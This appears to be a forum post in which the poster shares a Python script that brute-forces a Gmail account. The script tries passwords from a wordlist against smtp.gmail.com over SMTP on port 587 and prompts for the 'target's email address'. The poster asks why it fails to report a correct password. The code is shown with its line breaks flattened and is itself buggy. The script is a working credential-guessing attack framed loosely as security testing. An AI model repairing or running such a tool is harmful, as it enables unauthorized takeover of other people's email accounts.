I recently have just finished my python google brute force to test security. I have put in the correct password for my account & with the email but it doesn't say that it's correct.
I dont think that it is because the checker is old. I think I may be doing something wrong with the port with the smtp.gmail.com
Here's my code
import smtplibsmtp_srverG= smtplib.SMTP('smtp.gmail.com', 587)
smtp_srverG.starttls()user = input("Enter the target's email address: ")
passwfile = input("Enter the password file name: ")
passwfile = open(passwfile, "r")for password in passwfile:try:smtp_srverG.login(user, password)print("[+] Password Found: %s" % password)break;except smtplib.SMTPAuthenticationError:print("[!] Password Incorrect: %s" % password)
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